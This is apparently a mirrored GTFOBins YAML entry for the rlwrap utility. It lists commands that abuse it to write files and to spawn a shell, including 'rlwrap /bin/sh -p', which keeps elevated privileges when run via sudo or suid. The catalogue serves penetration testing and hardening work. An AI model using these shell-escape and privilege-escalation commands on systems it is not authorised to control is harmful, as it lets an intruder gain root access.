mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
24 lines
443 B
Plaintext
24 lines
443 B
Plaintext
---
|
|
functions:
|
|
file-write:
|
|
- binary: false
|
|
code: |-
|
|
rlwrap -l /path/to/output-file echo DATA
|
|
comment: |-
|
|
This adds timestamps to the output file. This relies on the external `echo` command.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
rlwrap /bin/sh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
rlwrap /bin/sh -p
|
|
shell: false
|
|
unprivileged:
|
|
...
|